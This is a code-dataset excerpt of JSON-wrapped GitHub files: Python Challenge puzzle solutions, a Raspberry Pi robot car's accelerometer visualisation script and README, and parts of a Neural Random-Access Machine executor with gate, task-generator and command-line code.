"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\n\ndef pex1():\n '''\n Answer: ocr\n '''\n import string\n alpha = list(string.ascii_lowercase)\n alpha.extend(['a', 'b'])\n cin = input(\"String: \")\n cin_alpha = list(cin)\n answer = []\n for i in cin:\n if i in string.ascii_lowercase:\n alpha_index = alpha.index(i)\n answer.append(alpha[alpha_index+2])\n else:\n answer.append(i)\n return ''.join(answer)\n"
},
{
"alpha_fraction": 0.5257142782211304,
"alphanum_fraction": 0.5428571701049805,
"avg_line_length": 17.421052932739258,
"blob_id": "64793711f023bdeb66bae3f78d240863b8e3e385",
"content_id": "3a83b000179e429c6845c8e1ee68ad59bad3f806",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 350,
"license_type": "permissive",
"max_line_length": 38,
"num_lines": 19,
"path": "/pex2.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\n\ndef pex2():\n '''\n Answer: equality\n '''\n import string\n file = open('pex2.txt')\n line = file.read()\n key = list(line)\n alpha = list(string.ascii_letters)\n ans = []\n for i in key:\n if i in alpha:\n ans.append(i)\n file.close()\n return ans\n"
},
{
"alpha_fraction": 0.4529540538787842,
"alphanum_fraction": 0.4770240783691406,
"avg_line_length": 25.882352828979492,
"blob_id": "2719b96ef4860ddfd5dcd4de0160f97ee6e41b75",
"content_id": "90d44d0aeb880ae4a15e14515e75e574aefbf33f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 457,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 17,
"path": "/pex5.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\ndef pex5():\n import pickle\n '''\n Unpickle the banner.p file in the source code and then \"print the banner\"\n\n Answer: channel\n '''\n f = open('banner.p', 'rb')\n stuff = pickle.load(f)\n for i in a:\n for j in range(0, len(i)):\n if j == len(i)-1:\n print(i[j][0]*i[j][1])\n print(i[j][0]*i[j][1], end='')\n"
}
] | 8 |
celibertojr/RobotCar4WBCAM
|
https://github.com/celibertojr/RobotCar4WBCAM
|
5955a0cdb8030284a0f995f727ea10fada641606
|
4ad6d1a0f68de8e77c3618a20be400025ccb7620
|
3fa31586a3c4452a98d8cf58ccda34f09ef1ba93
|
refs/heads/master
| 2023-03-04T11:33:31.943924 | 2023-02-14T21:27:19 | 2023-02-14T21:27:19 | 78,648,745 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.46875494718551636,
"alphanum_fraction": 0.5320360660552979,
"avg_line_length": 26.723684310913086,
"blob_id": "ec50935c1a4275cc9ffcc290e60de9a59d090f0a",
"content_id": "d6786ddbb9f3318732ceab5831517992e1a4f529",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6321,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 228,
"path": "/fonte/display.py",
"repo_name": "celibertojr/RobotCar4WBCAM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport smbus\nimport pygame\nimport urllib\nimport time\nimport math\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom math import radians\nfrom pygame.locals import *\n\n# Power management registers\npower_mgmt_1 = 0x6b\npower_mgmt_2 = 0x6c\n\nSCREEN_SIZE = (800, 600)\nSCALAR = .5\nSCALAR2 = 0.2\n\ndef read_byte(adr):\n return bus.read_byte_data(address, adr)\n\ndef read_word(adr):\n high = bus.read_byte_data(address, adr)\n low = bus.read_byte_data(address, adr+1)\n val = (high << 8) + low\n return val\n\ndef read_word_2c(adr):\n val = read_word(adr)\n if (val >= 0x8000):\n return -((65535 - val) + 1)\n else:\n return val\n\ndef dist(a,b):\n return math.sqrt((a*a)+(b*b))\n\ndef get_y_rotation(x,y,z):\n radians = math.atan2(x, dist(y,z))\n return -math.degrees(radians)\n\ndef get_x_rotation(x,y,z):\n radians = math.atan2(y, dist(x,z))\n return math.degrees(radians)\n\ndef get_z_rotation(x,y,z):\n radians = math.atan2(y,z)\n #radians = math.atan((math.sqrt(x*x+y*y)/z))\n return math.degrees(radians)\n\nbus = smbus.SMBus(1) # or bus = smbus.SMBus(1) for Revision 2 boards\naddress = 0x68 # This is the address value read via the i2cdetect command\n\n# Now wake the 6050 up as it starts in sleep mode\nbus.write_byte_data(address, power_mgmt_1, 0)\n\ndef get_current_perf(axis):\n\taccel_xout = read_word_2c(0x3b)\n\taccel_yout = read_word_2c(0x3d)\n\taccel_zout = read_word_2c(0x3f)\n\taccel_xout_scaled = accel_xout / 16384.0\n\taccel_yout_scaled = accel_yout / 16384.0\n\taccel_zout_scaled = accel_zout / 16384.0\n\n\tif axis == \"x\":\n\t\tvalue = round(get_x_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled), 2)\n\t\tprint \"x rotation: \" , value\n\t\treturn value\n\telif axis == \"y\":\n\t\tvalue = round(get_y_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled), 2)\n\t\tprint \"y rotation: \" , value\n\t\treturn value\n\telif axis == \"z\":\n\t\tvalue = round(get_z_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled), 2)\n\t\tprint \"z rotation: \" , value\n\t\treturn value\n\telse: \n\t\treturn False\n\ndef resize(width, height):\n glViewport(0, 0, width, height)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(45.0, float(width) / height, 0.001, 10.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n \ndef init():\n glEnable(GL_DEPTH_TEST)\n glClearColor(0.0, 0.0, 0.0, 0.0)\n glShadeModel(GL_SMOOTH)\n glEnable(GL_BLEND)\n glEnable(GL_POLYGON_SMOOTH)\n glHint(GL_POLYGON_SMOOTH_HINT, GL_NICEST)\n glEnable(GL_COLOR_MATERIAL)\n glEnable(GL_LIGHTING)\n glEnable(GL_LIGHT0)\n glLightfv(GL_LIGHT0, GL_AMBIENT, (0.3, 0.3, 0.3, 1.0));\n\n# def read_values():\n# #link = \"http://192.168.1.65:8080\" # Change this address to your settings\n# #f = urllib.urlopen(link)\n# myfile = \"45 45\"\n# return myfile.split(\" \")\n\ndef run():\n pygame.init()\n screen = pygame.display.set_mode(SCREEN_SIZE, HWSURFACE | OPENGL | DOUBLEBUF)\n resize(*SCREEN_SIZE)\n init()\n clock = pygame.time.Clock()\n cube = Cube((0.0, 0.0, 0.0), (.5, .5, .7))\n glTranslatef(0.0,0.0, -5)\n while True:\n then = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type == QUIT:\n return\n if event.type == KEYUP and event.key == K_ESCAPE:\n return\n\n y_angle = get_current_perf('y')\n #z_angle = get_current_perf('z')\n x_angle = get_current_perf('x')\n\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n glColor((1.,1.,1.))\n glLineWidth(1)\n glBegin(GL_LINES)\n\n for x in range(-20, 22, 2):\n glVertex3f(x/10.,-1,-1)\n glVertex3f(x/10.,-1,1)\n \n for x in range(-20, 22, 2):\n glVertex3f(x/10.,-1, -1)\n glVertex3f(x/10., 1, -1)\n \n for z in range(-10, 12, 2):\n glVertex3f(-2, -1, z/10.)\n glVertex3f( 2, -1, z/10.)\n\n for z in range(-10, 12, 2):\n glVertex3f(-2, -1, z/10.)\n glVertex3f(-2, 1, z/10.)\n\n for z in range(-10, 12, 2):\n glVertex3f( 2, -1, z/10.)\n glVertex3f( 2, 1, z/10.)\n\n for y in range(-10, 12, 2):\n glVertex3f(-2, y/10., -1)\n glVertex3f( 2, y/10., -1)\n \n for y in range(-10, 12, 2):\n glVertex3f(-2, y/10., 1)\n glVertex3f(-2, y/10., -1)\n \n for y in range(-10, 12, 2):\n glVertex3f(2, y/10., 1)\n glVertex3f(2, y/10., -1)\n \n glEnd()\n glPushMatrix()\n glRotate(float(y_angle), 1, 0, 0)\n glRotate(float(x_angle), 0, 0, 1)\n #glRotate(float(z_angle), 0, 1, 0)\n cube.render()\n glPopMatrix()\n pygame.display.flip()\n time.sleep(0.1)\n\nclass Cube(object):\n\n def __init__(self, position, color):\n self.position = position\n self.color = color\n\n # Cube information\n num_faces = 6\n\n vertices = [ (-1.0, -0.05, 0.5),\n (1.0, -0.05, 0.5),\n (1.0, 0.05, 0.5),\n (-1.0, 0.05, 0.5),\n (-1.0, -0.05, -0.5),\n (1.0, -0.05, -0.5),\n (1.0, 0.05, -0.5),\n (-1.0, 0.05, -0.5) ]\n\n normals = [ (0.0, 0.0, +1.0), # front\n (0.0, 0.0, -1.0), # back\n (+1.0, 0.0, 0.0), # right\n (-1.0, 0.0, 0.0), # left\n (0.0, +1.0, 0.0), # top\n (0.0, -1.0, 0.0) ] # bottom\n\n vertex_indices = [ (0, 1, 2, 3), # front\n (4, 5, 6, 7), # back\n (1, 5, 6, 2), # right\n (0, 4, 7, 3), # left\n (3, 2, 6, 7), # top\n (0, 1, 5, 4) ] # bottom\n\n def render(self):\n then = pygame.time.get_ticks()\n glColor(self.color)\n\n vertices = self.vertices\n\n # Draw all 6 faces of the cube\n glBegin(GL_QUADS)\n\n for face_no in xrange(self.num_faces):\n glNormal3dv(self.normals[face_no])\n v1, v2, v3, v4 = self.vertex_indices[face_no]\n glVertex(vertices[v1])\n glVertex(vertices[v2])\n glVertex(vertices[v3])\n glVertex(vertices[v4])\n glEnd()\n\nif __name__ == \"__main__\":\n run()\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.6339144110679626,
"alphanum_fraction": 0.6798732280731201,
"avg_line_length": 14.390243530273438,
"blob_id": "a71280f77446ab6f28668c5cdadc16a660872bd0",
"content_id": "f9bf2a86d896b74d841ef26811eeb960c0de714b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 631,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 41,
"path": "/README.md",
"repo_name": "celibertojr/RobotCar4WBCAM",
"src_encoding": "UTF-8",
"text": "# RobotCar4WB-CAM\n\n#The Robot car 4W\n\n## Original idea\n\nThe original idea comes from https://github.com/phfbertoleti/RoboPi.\n\n\n## Diagram (original project)\n\n\n\n\n\n## Motor Drive Circuit\n\n* GPIO18\tpin 12\tLeft motor\n* GPIO23\tpin 16\tRight motor\n* GND\t pin 06 \n\n# Sensors and parts\n\n* 1 - Raspberry PI 3\n* 2 - Speedy Sensor Encoder\n* 1 - IMU MPU-9250\n* 1 - cheap camera\n* 1 - GPS (soon)\n* 2 - Rechargeable Power Bank 2200 + battery pack\n\n\n## The Robot\n\n\n\n\n\n\n\n\n# This project is ongoing I will try to update it every month but not promise! :-)\n"
}
] | 2 |
DrugoLebowski/denn-lite-nram-executor
|
https://github.com/DrugoLebowski/denn-lite-nram-executor
|
88d3c90ba8ac464e8dda0dcc9adda375d3cd0bfd
|
3abb49b3f28cc1457f246b158167f664eaf37a8e
|
844645960ab1617046012749da1c023eaa131286
|
refs/heads/master
| 2021-05-06T19:48:24.628617 | 2018-03-29T23:10:33 | 2018-03-29T23:10:33 | 112,182,172 | 3 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.48343372344970703,
"alphanum_fraction": 0.5075300931930542,
"avg_line_length": 26.70833396911621,
"blob_id": "bf18cc143d0e0611362ad38962721cd5f87ad0ae",
"content_id": "1e63d21fe3ab89b87783c20f4abf2e87f479af89",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 664,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 24,
"path": "/gates/LessEqualThan.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\nfrom numpy import zeros_like\n\n# Project\nfrom gates.Gate import Gate\n\n\nclass LessEqualThan(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n def create_matrix(M, idx):\n new_matrix = zeros_like(M)\n new_matrix[0, idx:] = M[0, idx:] # [[x, x, x], [0, x, x], [0, 0, x]]\n return new_matrix\n\n Z = zeros_like(A)\n B_prime = [create_matrix(B, idx) for idx in range(B.shape[1])]\n B = np.stack(B_prime, axis=1)\n A = A[..., None]\n Z[0, 1] = (A[0] * B[0]).sum()\n Z[0, 0] = (1 - Z[0, 1])\n\n return M, Z"
},
{
"alpha_fraction": 0.5891163349151611,
"alphanum_fraction": 0.6075885891914368,
"avg_line_length": 44.522727966308594,
"blob_id": "7affe429bbfd9f801b293d542bb32f455f0eae15",
"content_id": "2a14420b9faebf521ae9d2b9ec40e7e89b5f431b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2007,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 44,
"path": "/tasks/TaskSum.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskSum(Task):\n \"\"\" [Sum]\n Given pointers to 2 arrays A and B, and the pointer to the output o,\n sum the two arrays into one array. The input is given as:\n a, b, o, A[0], .., A[n − 1], G, B[0], ..., B[m − 1], G,\n where G is a special guardian value, a and b point to\n the first elements of arrays A and B respectively, and o\n points to the address after the second G.\n The A + B array should be written starting from position o.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n offset = 3\n remaining_size = self.max_int - 6\n arrays_memory_size = int(remaining_size / 3)\n if not remaining_size % 3 == 0:\n raise Exception(\"%s: Memory space is not sufficient!\" % TaskSum.__class__.__name__)\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n list_elements_a = np.random.randint(1, self.max_int, size=(self.batch_size, arrays_memory_size), dtype=np.int32)\n list_elements_b = np.random.randint(1, self.max_int, size=(self.batch_size, arrays_memory_size), dtype=np.int32)\n list_elements_a_plus_b = np.mod(list_elements_a + list_elements_b, self.max_int)\n\n init_mem[:, 0] = offset\n init_mem[:, 1] = offset + arrays_memory_size + 1\n init_mem[:, 2] = offset + (2 * arrays_memory_size) + 2\n init_mem[:, offset:(offset + arrays_memory_size)] = list_elements_a\n init_mem[:, (offset + arrays_memory_size + 1):(offset + (2 * arrays_memory_size) + 1)] = list_elements_b\n\n out_mem = init_mem.copy()\n out_mem[:, (offset + (2 * arrays_memory_size) + 2):(offset + (3 * arrays_memory_size) + 2)] = \\\n list_elements_a_plus_b\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, (offset + (2 * arrays_memory_size) + 2):(offset + (3 * arrays_memory_size) + 2)] = 1\n\n return init_mem, out_mem, cost_mask\n"
},
{
"alpha_fraction": 0.5217047929763794,
"alphanum_fraction": 0.5509076714515686,
"avg_line_length": 39.870967864990234,
"blob_id": "350c4202e7ac81cb27168b4fa186fc6d451b6246",
"content_id": "134c717659dda10b4566587d855d863aab5a4579",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1271,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 31,
"path": "/tasks/TaskSwap.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskSwap(Task):\n \"\"\" [Swap]\n Given two pointers p, q and an array A, swap elements A[p] and A[q]. Input is\n given as p, q, A[0], .., A[p], ..., A[q], ..., A[n − 1], 0. The expected modified array A is:\n A[0], ..., A[q], ..., A[p], ..., A[n − 1].\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n idx_1 = np.random.randint(2, self.max_int - 3, size=(self.batch_size), dtype=np.int32)\n idx_2 = np.array([], dtype=np.int32)\n for i, n in enumerate(idx_1):\n idx_2 = np.append(idx_2, np.random.randint(idx_1[i] + 1, self.max_int - 2))\n init_mem = np.random.randint(1, self.max_int, size=(self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, self.max_int - 1] = 0\n init_mem[:, 0] = idx_1\n init_mem[:, 1] = idx_2\n\n error_mask = np.ones((self.batch_size, self.max_int), dtype=np.int8)\n out_mem = init_mem.copy()\n for i in range(self.batch_size):\n out_mem[i, idx_1[i]], out_mem[i, idx_2[i]] = np.copy(out_mem[i, idx_2[i]]), np.copy(out_mem[i, idx_1[i]])\n error_mask[i, idx_1[i]], error_mask[i, idx_2[i]] = 1, 1\n\n return init_mem, out_mem, error_mask\n"
},
{
"alpha_fraction": 0.5415986776351929,
"alphanum_fraction": 0.5448613166809082,
"avg_line_length": 23.039215087890625,
"blob_id": "5c02b78d317914c534b199cbffaf5fc5771ec2db",
"content_id": "a64e49eb5bd5ec235a8d4af72909bc04b7850acc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1226,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 51,
"path": "/Node.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport pygraphviz as pgv\n\nclass Node(object):\n\n # Enum\n Register = 0\n Gate = 1\n\n def __init__(self, type: int, name: str, arity: int = -1):\n self.__type = type\n self.__name = name\n self.__arity = arity\n self.__nodes = []\n\n @property\n def type(self) -> int:\n return self.__type\n\n @type.setter\n def type(self, type: int) -> None:\n self.__type = type\n\n @property\n def name(self) -> str:\n return self.__name\n\n @name.setter\n def name(self, name: str) -> None:\n self.__name = name\n\n @property\n def nodes(self) -> list:\n return self.__nodes\n\n @nodes.setter\n def nodes(self, nodes: list) -> None:\n self.__nodes = nodes\n\n def add_node(self, node):\n self.__nodes.append(node)\n\n def check_validity(self) -> bool:\n \"\"\"Check recursively whether there is a path to a Register of the next timestep or to the gate Write.\"\"\"\n nodes = self.__nodes.copy()\n for node in self.__nodes:\n if not node.check_validity():\n nodes.remove(node)\n if self.name != \"Write\" and \"R'\" not in self.name and len(nodes) == 0:\n return False\n return True\n"
},
{
"alpha_fraction": 0.5431211590766907,
"alphanum_fraction": 0.5564681887626648,
"avg_line_length": 44.943397521972656,
"blob_id": "b5a83924608a12332df8a441f8baaef3ca779f11",
"content_id": "9991a03e712db14ad6d928eedde999a79650f913",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4872,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 106,
"path": "/tasks/TaskWalkBST.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskWalkBST(Task):\n \"\"\" [WalkBST]\n Given a pointer to the root of a Binary Search Tree, and a path to be traversed,\n return the element at the end of the path. The BST nodes are represented as triples (v, l,\n r), where v is the value, and l, r are pointers to the left/right child. The triples are placed\n randomly in the memory. Input is given as root, out, d1, d2, ..., dk, NULL, ..., where root\n points to the root node and out is a slot for the output. The sequence d1...dk, di ∈ {0, 1}\n represents the path to be traversed: di = 0 means that the network should go to the left\n child, di = 1 represents going to the right child.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n def get_element_index(permutation: np.ndarray, idx: int) -> int:\n \"\"\" Get the index where the permutation have the value idx. \"\"\"\n return np.where(permutation == idx)[0][0]\n\n def insert_in_bst(bst: np.ndarray, pointer: int, element: int, element_pointer_in_memory: int) -> np.ndarray:\n \"\"\" Insert an element in the BST. \"\"\"\n if bst[pointer] > element:\n if bst[pointer + 1] == -1:\n bst[pointer + 1] = element_pointer_in_memory\n return bst\n else:\n return insert_in_bst(bst, int(bst[pointer + 1]), element, element_pointer_in_memory)\n else:\n if bst[pointer + 2] == -1:\n bst[pointer + 2] = element_pointer_in_memory\n return bst\n else:\n return insert_in_bst(bst, int(bst[pointer + 2]), element, element_pointer_in_memory)\n\n def walk_bst(bst: np.ndarray, walk: np.ndarray, previous_pointer: int, pointer: int):\n \"\"\" Walk, set a walk sequence, the bst and return the last element encountered. \"\"\"\n if pointer == -1:\n return bst[previous_pointer]\n elif len(walk) == 0:\n return bst[pointer]\n else:\n if walk[0] == 0:\n return walk_bst(bst, walk[1:], pointer, int(bst[pointer + 1]))\n else:\n return walk_bst(bst, walk[1:], pointer, int(bst[pointer + 2]))\n\n remaining_size = self.max_int - 3\n num_elements = int(remaining_size / 4)\n offset = 2\n divider_pointer = offset + num_elements\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n out_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n\n # Create and initialize elements of bsts\n list_elements = np.random.randint(1, self.max_int, size=(self.batch_size, num_elements), dtype=np.int32)\n\n # Create and initialize the walk in bst\n walks_bst = np.random.randint(0, 2, size=(self.batch_size, num_elements), dtype=np.int32)\n\n # Create the elements order in memory through permutation matrices\n orders_in_memory = np.stack([np.random.permutation(num_elements)\n for _ in range(self.batch_size)], axis=0)\n\n for e in range(self.batch_size):\n # Create a temporary vector that contains a BST for an example\n example_bst = np.ones(num_elements * 3, dtype=np.int32) * -1\n root_pointer = -1\n for i in range(num_elements):\n pointer = get_element_index(orders_in_memory[e], i)\n example_bst[pointer * 3] = list_elements[e, i]\n if i is 0:\n root_pointer = pointer * 3\n\n # Initialize BST\n for i in range(1, num_elements):\n example_bst = insert_in_bst(example_bst, root_pointer, list_elements[e, i],\n get_element_index(orders_in_memory[e], i) * 3)\n\n # Fill the memories\n init_mem[e, 0] = divider_pointer + 1 + root_pointer\n init_mem[e, offset:divider_pointer] = walks_bst[e]\n\n # Walk the bst before the normalization\n value_found = walk_bst(example_bst, walks_bst[e], -1, root_pointer)\n\n # Normalize bst pointers for the memory and then save it\n for idx in range(example_bst.size):\n if idx % 3 != 0:\n if example_bst[idx] != -1:\n example_bst[idx] += divider_pointer + 1\n else:\n example_bst[idx] = 0\n\n init_mem[e, (divider_pointer + 1):(divider_pointer + 1 + (3 * num_elements))] = example_bst\n\n out_mem[e] = init_mem[e]\n out_mem[e, 1] = value_found\n\n cost_mask = np.ones((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, 0] = 0\n\n return init_mem, out_mem, cost_mask\n"
},
{
"alpha_fraction": 0.6782572269439697,
"alphanum_fraction": 0.7029744386672974,
"avg_line_length": 23.86458396911621,
"blob_id": "1fad5a55ad2b97f9770795c605b1fb8e1d9e6e43",
"content_id": "3fa05c2a1679927c23592fa77601980b64bffa41",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2387,
"license_type": "permissive",
"max_line_length": 205,
"num_lines": 96,
"path": "/Readme.md",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "NRAM Executor\n=============\n\nSpecial thanks to [Andrew Gibiansky](http://andrew.gibiansky.com) for\n[code inspirations](https://github.com/gibiansky/experiments) and [Gabriele Di Bari](https://github.com/Gabriele91) for his support.\n\nThis implementation of Neural Random-Access Machines ([https://arxiv.org/pdf/1511.06392.pdf](https://arxiv.org/pdf/1511.06392.pdf)) does not contains any learning algorithm, so don't use it for this scope.\nIts only purpose is to test a pre-instructed neural network generated with [DENN-LITE](https://github.com/Gabriele91/DENN-LITE) over a specific task.\n\nAnyway almost all the NRAM aspects are implemented, the only things missing out are cost calculation (that it is not useful for this scope) and some plotting functions.\n\nPrerequisites\n-------------\n- Python 3.5+\n- NumPy 1.14.0\n- matplotlib 2.1\n- pygraphviz 1.3.1\n- tqdm 4.19.6\n#### Install requirements \n```sh\n$ pip install -r requirements.txt\n```\n\nUsage\n-----\nTo test a configuration:\n\n $ python main.py tests/test_copy_working_best.json\n\nTo recall the help:\n\n $ python main.py -h\n\nFlags\n-----\n#### --info\nActivate the printing to console of every execution timestep, with all\nthe information about the gates and registers (like coefficients and values).\n\n```sh\n$ python main.py tests/example.json --info\n\nOR\n\n$ python main.py tests/example.json -i\n```\n\n#### --timesteps N+\nThe list of timesteps for which the NRAM should been run.\n```sh\n$ python main.py tests/example.py --timesteps 10 [...]\n\nOR\n\n$ python main.py tests/example.py -t 10 [...]\n```\n\n#### --max_int N+\nThe list of difficulties of integers for which the NRAM should work on.\n```sh\n$ python main.py tests/example.py --max_int 10 [...]\n\nOR\n\n$ python main.py tests/example.py -mi 10 [...]\n```\n\n#### --print_circuits [1 | 2]\nWith **1** activate the complete printing of the circuits and with **2** activate the pruned printing of the circuits.\n```sh\n$ python main.py tests/example.py --print_circuits 2\n\nOR\n\n$ python main.py tests/example.py -pc 2\n```\n\n#### --print_memories\nActivate the printing of the memories status in TeX format.\n```sh\n$ python main.py tests/example.py --print_circuits 2\n\nOR\n\n$ python main.py tests/example.py -pc 2\n```\n\n#### --process_pool [1|2|3|4|...]\nThe number of process to spawn when the NRAM compute the samples.\n```sh\n$ python main.py tests/example.py --process_pool 8\n\nOR\n\n$ python main.py tests/example.py -pp 8\n```\n"
},
{
"alpha_fraction": 0.5690093040466309,
"alphanum_fraction": 0.5884843468666077,
"avg_line_length": 45.313724517822266,
"blob_id": "66d3564f4cb2ffbddf82b53f2baaa8aaf6a68340",
"content_id": "9049fb2cb44a3d6e3ca0c46b6f0840bcade7e883",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2366,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 51,
"path": "/tasks/TaskMerge.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskMerge(Task):\n \"\"\" [Merge]\n Given pointers to 2 sorted arrays A and B, and the pointer to the output o,\n merge the two arrays into one sorted array. The input is given as: a, b, o, A[0], .., A[n −1],\n G, B[0], ..., B[m − 1], G, where G is a special guardian value, a and b point to the first\n elements of arrays A and B respectively, and o points to the address after the second G.\n The n + m element should be written in correct order starting from position o.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n remaining_size = self.max_int - 6\n offset = 3\n odd_space = not remaining_size % 2 == 0\n odd_subvector_space = not remaining_size % 4 == 0\n list_size_a = int(remaining_size / 4)\n list_size_b = int(list_size_a + 1 if odd_subvector_space else list_size_a)\n list_size_a_plus_b = list_size_a + list_size_b\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n list_elements_a = np.sort(\n np.random.randint(1, self.max_int, size=(self.batch_size, list_size_a), dtype=np.int32))\n list_elements_b = np.sort(\n np.random.randint(1, self.max_int, size=(self.batch_size, list_size_b), dtype=np.int32))\n list_elements_a_union_b = np.sort(np.concatenate((list_elements_a, list_elements_b), axis=1))\n\n init_mem[:, 0] = offset\n init_mem[:, 1] = offset + list_size_a + 1\n init_mem[:, 2] = offset + (2 * list_size_a) + (3 if odd_subvector_space else 2)\n init_mem[:, offset:(offset + list_size_a)] = list_elements_a\n init_mem[:, (offset + list_size_a)] = -1\n init_mem[:, (offset + list_size_a + 1):(offset + list_size_a_plus_b + 1)] = list_elements_b\n init_mem[:, (offset + list_size_a_plus_b + 1)] = -1\n if odd_space:\n init_mem[:, -2:] = -1\n else:\n init_mem[:, -1] = -1\n\n out_mem = init_mem.copy()\n out_mem[:, (offset + list_size_a_plus_b + 2):(offset + (2 * list_size_a_plus_b) + 2)] = list_elements_a_union_b\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, (offset + list_size_a_plus_b + 2):(offset + (2 * list_size_a_plus_b) + 2)] = 1\n\n return init_mem, out_mem, cost_mask\n"
},
{
"alpha_fraction": 0.48649337887763977,
"alphanum_fraction": 0.48853209614753723,
"avg_line_length": 37.85148620605469,
"blob_id": "274196f8af6c54d25a4efa132a163330a89598fe",
"content_id": "7283bdc23da8f134fec501107c5ab8072721e55f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3930,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 101,
"path": "/main.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Standard\nimport os\nimport json\nfrom argparse import ArgumentParser\n\n# Project\nfrom App import App\nfrom NRam import NRam\nfrom NRamContext import NRamContext\nfrom factories.GateFactory import GateFactory\nfrom util import create_dir\n\n\nif __name__ == \"__main__\":\n create_dir(App.get(\"images_path\"))\n\n ap = ArgumentParser()\n\n ap.add_argument(\"file\",\n type=str,\n help=\"The file where resides the configuration of NRAM\", )\n ap.add_argument(\"--batch_size\", \"-bs\",\n dest=\"batch_size\",\n type=int,\n default=2,\n help=\"The examples to analyze\", )\n ap.add_argument(\"--timesteps\", \"-t\",\n dest=\"timesteps\",\n nargs=\"+\",\n type=int,\n required=True,\n help=\"The timesteps that the NRAM must execute\", )\n ap.add_argument(\"--max_ints\", \"-mi\",\n dest=\"max_ints\",\n nargs=\"+\",\n type=int,\n required=True,\n help=\"The dimensions of the sets of numbers\", )\n ap.add_argument(\"--sequence_size\", \"-ss\",\n dest=\"sequence_size\",\n nargs=\"+\",\n type=int,\n required=True,\n help=\"The size of the input sequence.\", )\n ap.add_argument(\"--info\", \"-i\",\n dest=\"info\",\n nargs=\"?\",\n const=True,\n default=False,\n help=\"Write out the info of NRAM, like memories and registers\", )\n ap.add_argument(\"--print_circuits\", 